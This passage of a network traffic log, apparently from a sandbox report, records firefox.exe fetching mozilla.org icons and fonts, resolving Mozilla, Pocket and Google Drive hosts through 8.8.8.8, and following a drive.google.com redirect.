sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-goog-generation: 1729862786120905
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 677
x-goog-meta-goog-reserved-file-mtime: 1729862674
x-goog-hash: crc32c=YU0IUQ==
x-goog-hash: md5=qlM06Fuupxh8Lh2J+NyQzA==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY1Qy3V8fDQz8SCz8K6yCfMrTFVkSMoMG94VQ2O4LFnviEqWc5erAGCqny2xjXo_5qu05dM
server: UploadServer
expires: Mon, 04 Nov 2024 15:48:49 GMT
last-modified: Mon, 04 Nov 2024 10:29:47 GMT
etag: "aa5334e85baea7187c2e1d89f8dc90cc"
content-type: image/svg+xml
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1166163
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300023-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 136, 3362
x-timer: S1736790040.217823,VS0,VE0
content-length: 677
GET

https://www.mozilla.org/media/protocol/img/icons/social/youtube/white.4f314c43c69d.svg

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/protocol/img/icons/social/youtube/white.4f314c43c69d.svg HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/media/css/m24-navigation-and-footer.e8f9c32ba5aa.css
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-goog-generation: 1725999573743219
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 472
x-goog-meta-goog-reserved-file-mtime: 1725999459
x-goog-hash: crc32c=FcwtWA==
x-goog-hash: md5=TzFMQ8adgn0lO609uyKYXA==
x-goog-storage-class: STANDARD
x-guploader-uploadid: AHmUCY0uopcvCYTxjihD10DFgtNwk4qje25TXRe8YqKYn1KwtzDr5Igc4oh59LVhls0gRuOWIRM
server: UploadServer
access-control-expose-headers: *
expires: Mon, 04 Nov 2024 14:54:16 GMT
last-modified: Mon, 04 Nov 2024 10:29:47 GMT
etag: "4f314c43c69d827d253bad3dbb22985c"
content-type: image/svg+xml
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1176106
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300046-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 64, 3341
x-timer: S1736790040.219731,VS0,VE0
content-length: 472
GET

https://www.mozilla.org/media/img/icons/m24-small/globe-white.a76258f6a4cc.svg

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/img/icons/m24-small/globe-white.a76258f6a4cc.svg HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/media/css/m24-navigation-and-footer.e8f9c32ba5aa.css
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Fri, 06 Dec 2024 20:55:19 GMT
last-modified: Fri, 06 Dec 2024 19:51:00 GMT
etag: "3aab868855c7c2facfd1131b0b31015f"
x-goog-generation: 1733514660876872
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 183
x-goog-meta-goog-reserved-file-mtime: 1733514601
content-type: image/svg+xml
x-goog-hash: crc32c=o3yX4A==
x-goog-hash: md5=OquGiFXHwvrP0RMbCzEBXw==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AFiumC7_GwtG4OcrVkzLSteSpwedug5Dj-WYAcfw1NX17TX_-JLql3yqxUooyjvWI2TIa03sOiIDZa5A_A
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1163994
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300092-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 4, 3484
x-timer: S1736790040.242714,VS0,VE0
content-length: 183
GET

https://www.mozilla.org/media/img/icons/m24-small/down-caret-white.3aab868855c7.svg

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/img/icons/m24-small/down-caret-white.3aab868855c7.svg HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/media/css/m24-navigation-and-footer.e8f9c32ba5aa.css
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Fri, 06 Dec 2024 20:55:19 GMT
last-modified: Fri, 06 Dec 2024 19:51:01 GMT
etag: "a76258f6a4cc46b2eed6225b15e90f96"
x-goog-generation: 1733514661025634
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 778
x-goog-meta-goog-reserved-file-mtime: 1733514601
content-type: image/svg+xml
x-goog-hash: crc32c=0MhJAg==
x-goog-hash: md5=p2JY9qTMRrLu1iJbFekPlg==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AFiumC7RqEyfDfBbID4WEmwefwMGAaWjyPruxsiVJrHkmNAxm20JI7pYAu0cikRiwDw7um_26Uo
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1166165
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400081-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 4, 3500
x-timer: S1736790040.242613,VS0,VE0
content-length: 778
GET

https://www.mozilla.org/media/protocol/fonts/Inter-Regular.d55e957612a3.woff2

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/protocol/fonts/Inter-Regular.d55e957612a3.woff2 HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: identity
referer: https://www.mozilla.org/media/css/protocol-firefox.e581097aaf66.css
sec-fetch-dest: font
sec-fetch-mode: cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Fri, 08 Nov 2024 17:45:40 GMT
last-modified: Thu, 07 Nov 2024 23:33:35 GMT
etag: "d55e957612a3b2a373925d920f4af6b1"
x-goog-generation: 1731022415608542
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 88816
x-goog-meta-goog-reserved-file-mtime: 1731022301
content-type: font/woff2
x-goog-hash: crc32c=2hy73A==
x-goog-hash: md5=1V6VdhKjsqNzkl2SD0r2sQ==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY2OqZpcsChGRd9Gm0qxhwn8cr4hBRQefkZlr60zFRXB0tm3heRMbD5kjcYLR1FBw4vM6fNbBVhqxQ
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1171316
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300091-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 7, 2166
x-timer: S1736790040.243055,VS0,VE0
content-length: 88816
GET

https://www.mozilla.org/media/protocol/fonts/Metropolis-Bold.6a80125e795a.woff2

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/protocol/fonts/Metropolis-Bold.6a80125e795a.woff2 HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: identity
referer: https://www.mozilla.org/media/css/protocol-firefox.e581097aaf66.css
sec-fetch-dest: font
sec-fetch-mode: cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Fri, 08 Nov 2024 17:45:40 GMT
last-modified: Thu, 07 Nov 2024 23:33:35 GMT
etag: "6a80125e795aa81c6f251aa83e44062b"
x-goog-generation: 1731022415569053
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 16728
x-goog-meta-goog-reserved-file-mtime: 1731022301
content-type: font/woff2
x-goog-hash: crc32c=lWtUXA==
x-goog-hash: md5=aoASXnlaqBxvJRqoPkQGKw==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY2HL6XqeuWIbDAn5DrK9hwp7-prmgGYb9GRQ53i2_IzZ2u2PznZXWHKrvEiqEx8RdGVFOUDJGmx5w
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1759135
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300081-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 4, 2231
x-timer: S1736790040.243433,VS0,VE0
content-length: 16728
GET

https://www.mozilla.org/media/fonts/m24/mozilla-text/MozillaText-SemiBold.c9ce5296db65.woff2

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/fonts/m24/mozilla-text/MozillaText-SemiBold.c9ce5296db65.woff2 HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: identity
referer: https://www.mozilla.org/media/css/m24-root.77a146bcaf17.css
sec-fetch-dest: font
sec-fetch-mode: cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Wed, 04 Dec 2024 22:11:28 GMT
last-modified: Wed, 04 Dec 2024 20:15:31 GMT
etag: "c9ce5296db657f9f585c68890e99c39f"
x-goog-generation: 1733343331621829
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 26260
x-goog-meta-goog-reserved-file-mtime: 1733343287
content-type: font/woff2
x-goog-hash: crc32c=yAx31Q==
x-goog-hash: md5=yc5Slttlf59YXGiJDpnDnw==
x-goog-storage-class: STANDARD
access-control-expose-headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
x-guploader-uploadid: AFiumC5vmJvAeWRXsJFErghWiEG4iEHmMornYYXEv6Uni1jeZMAhYx5Rvv9fGXo37GpQQdxWzXE
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1792654
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300073-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 12, 3447
x-timer: S1736790040.246913,VS0,VE0
content-length: 26260
GET

https://www.mozilla.org/media/fonts/m24/mozilla-text/MozillaText-Regular.3fa5c88b0954.woff2

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/fonts/m24/mozilla-text/MozillaText-Regular.3fa5c88b0954.woff2 HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: identity
referer: https://www.mozilla.org/media/css/m24-root.77a146bcaf17.css
sec-fetch-dest: font
sec-fetch-mode: cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Wed, 27 Nov 2024 04:52:51 GMT
last-modified: Mon, 25 Nov 2024 09:36:11 GMT
etag: "b351cf7c2c5c6c4cb8ca7d4c87cf9b8d"
x-goog-generation: 1732527371210244
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 451
x-goog-meta-goog-reserved-file-mtime: 1732527322
content-type: image/svg+xml
x-goog-hash: crc32c=6u6obg==
x-goog-hash: md5=s1HPfCxcbEy4yn1Mh8+bjQ==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AFiumC4MF7QpqG7XuDxbfqPEEYAX7d74SrVTFryycZyMbXAllKwWKLLVzXFu9AFiZtIOrUMVAfoPlw2GEA
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1170015
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400044-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 28, 101
x-timer: S1736790040.247172,VS0,VE0
content-length: 451
GET

https://www.mozilla.org/media/img/firefox/welcome/page20-21/back-up.b351cf7c2c5c.svg

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/img/firefox/welcome/page20-21/back-up.b351cf7c2c5c.svg HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Wed, 04 Dec 2024 22:11:28 GMT
last-modified: Wed, 04 Dec 2024 20:15:31 GMT
etag: "3fa5c88b095446f313c63d4b24bbffa0"
x-goog-generation: 1733343331673358
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 26192
x-goog-meta-goog-reserved-file-mtime: 1733343287
content-type: font/woff2
x-goog-hash: crc32c=28WjSg==
x-goog-hash: md5=P6XIiwlURvMTxj1LJLv/oA==
x-goog-storage-class: STANDARD
access-control-expose-headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
x-guploader-uploadid: AFiumC712cXVahqS46rB0x39MjpVvaD5zBFupz6-NGzoI0tC8FES1v_HBiCizhxCWs7zUHenyzgE67QEfQ
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1790852
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400027-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 12, 3427
x-timer: S1736790040.247196,VS0,VE0
content-length: 26192
GET

https://www.mozilla.org/media/img/firefox/welcome/page20-21/add-ons.809f56bff087.svg

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/img/firefox/welcome/page20-21/add-ons.809f56bff087.svg HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Mon, 11 Nov 2024 14:11:16 GMT
last-modified: Fri, 08 Nov 2024 20:07:57 GMT
etag: "809f56bff08721ea127dd5beb7868861"
x-goog-generation: 1731096477365294
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 1012
x-goog-meta-goog-reserved-file-mtime: 1731096409
content-type: image/svg+xml
x-goog-hash: crc32c=5ObDyw==
x-goog-hash: md5=gJ9Wv/CHIeoSfdW+t4aIYQ==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY2VqJpiKH3Y_PL8msRsVuCjEXnkduQysq_5HgnltKZoGpoXrIohi2eftltQl4UQ2A85QXRRD5I8hw
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1166394
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300066-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 15, 98
x-timer: S1736790040.257259,VS0,VE0
content-length: 1012
GET

https://www.mozilla.org/media/img/firefox/welcome/page20-21/community.bf0cb1c38902.svg

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/img/firefox/welcome/page20-21/community.bf0cb1c38902.svg HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Mon, 11 Nov 2024 14:11:16 GMT
last-modified: Fri, 08 Nov 2024 20:07:57 GMT
etag: "bf0cb1c389027f75af50b39848de917a"
x-goog-generation: 1731096477195663
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 896
x-goog-meta-goog-reserved-file-mtime: 1731096409
content-type: image/svg+xml
x-goog-hash: crc32c=ajmDfg==
x-goog-hash: md5=vwyxw4kCf3WvULOYSN6Reg==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY1StwjRkgOko2XubfUs-KE18Zz92dl10xwKPkOtabWoHVJqFB0v1Xyfc5cPhZycsc3rtDo
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1159983
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400108-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 23, 98
x-timer: S1736790040.283731,VS0,VE0
content-length: 896
GET

https://www.mozilla.org/media/img/favicons/firefox/browser/favicon-196x196.59e3822720be.png

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/img/favicons/firefox/browser/favicon-196x196.59e3822720be.png HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Fri, 08 Nov 2024 17:45:39 GMT
last-modified: Thu, 07 Nov 2024 23:32:38 GMT
etag: "59e3822720bedcc45ca5e6e6d3220ea9"
x-goog-generation: 1731022358512287
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 8050
x-goog-meta-goog-reserved-file-mtime: 1731022301
content-type: image/png
x-goog-hash: crc32c=ACeoNw==
x-goog-hash: md5=WeOCJyC+3MRcpebm0yIOqQ==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY3PuzyciJ0OwxWlmKawQgyY3D8QgFLNDswsZK3glFrOH0SRNC_qbdOfe4DZC_I-4n68J5RrunUPww
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1188763
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300105-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 10, 2235
x-timer: S1736790040.376287,VS0,VE0
content-length: 8050
GET

https://www.mozilla.org/media/img/favicons/firefox/browser/favicon.f093404c0135.ico

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/img/favicons/firefox/browser/favicon.f093404c0135.ico HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-goog-generation: 1727094498247922
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 15086
x-goog-meta-goog-reserved-file-mtime: 1727094460
x-goog-hash: crc32c=E9h0Yg==
x-goog-hash: md5=8JNATAE1nK2dDy+1FLZCgQ==
x-goog-storage-class: STANDARD
x-guploader-uploadid: AHmUCY0HEALdknxb4izlSAPvGfr1bWDceA-lmMVzeAv8q7s-DFOP_K4xaomQ8sCKLBJnuLwqIKo
server: UploadServer
access-control-expose-headers: *
expires: Fri, 08 Nov 2024 17:45:40 GMT
last-modified: Thu, 07 Nov 2024 23:32:38 GMT
etag: "f093404c01359cad9d0f2fb514b64281"
content-type: image/vnd.microsoft.icon
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1185606
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400080-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 4, 2321
x-timer: S1736790040.376590,VS0,VE0
content-length: 15086
DNS

www-mozilla.fastly-edge.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www-mozilla.fastly-edge.com

IN A

Response

www-mozilla.fastly-edge.com

IN A

151.101.67.19

www-mozilla.fastly-edge.com

IN A

151.101.131.19

www-mozilla.fastly-edge.com

IN A

151.101.3.19

www-mozilla.fastly-edge.com

IN A

151.101.195.19
DNS

www-mozilla.fastly-edge.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www-mozilla.fastly-edge.com

IN AAAA

Response

www-mozilla.fastly-edge.com

IN AAAA

2a04:4e42:600::787

www-mozilla.fastly-edge.com

IN AAAA

2a04:4e42:400::787

www-mozilla.fastly-edge.com

IN AAAA

2a04:4e42::787

www-mozilla.fastly-edge.com

IN AAAA

2a04:4e42:200::787
DNS

spocs.getpocket.com

firefox.exe

Remote address:

8.8.8.8:53

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

spocs.getpocket.com

firefox.exe

Remote address:

8.8.8.8:53

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN A

Response

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

172.60.21.104.in-addr.arpa

firefox.exe

Remote address:

8.8.8.8:53

Request

172.60.21.104.in-addr.arpa

IN PTR

Response
DNS

172.60.21.104.in-addr.arpa

firefox.exe

Remote address:

8.8.8.8:53

Request

172.60.21.104.in-addr.arpa

IN PTR

Response
DNS

19.131.101.151.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

19.131.101.151.in-addr.arpa

IN PTR

Response
DNS

firefox-api-proxy.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy.cdn.mozilla.net

IN A

Response

firefox-api-proxy.cdn.mozilla.net

IN CNAME

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

2600:1901:0:74e4::
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

2600:1901:0:74e4::
DNS

drive.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN A

Response

drive.google.com

IN A

172.217.169.78
DNS

drive.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN A

Response

drive.google.com

IN A

172.217.169.78
GET

http://drive.google.com/

firefox.exe

Remote address:

172.217.169.78:80

Request

GET / HTTP/1.1
Host: drive.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 301 Moved Permanently

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 13 Jan 2025 17:40:45 GMT
Location: https://drive.google.com/
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
DNS

drive.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN AAAA

Response

drive.google.com

IN AAAA

2a00:1450:4009:819::200e
DNS

drive.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN AAAA

Response

drive.google.com

IN AAAA

2a00:1450:4009:819::200e
GET

https://drive.google.com/

firefox.exe

Remote address:

172.217.169.78:443

Request

GET / HTTP/2.0
host: drive.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
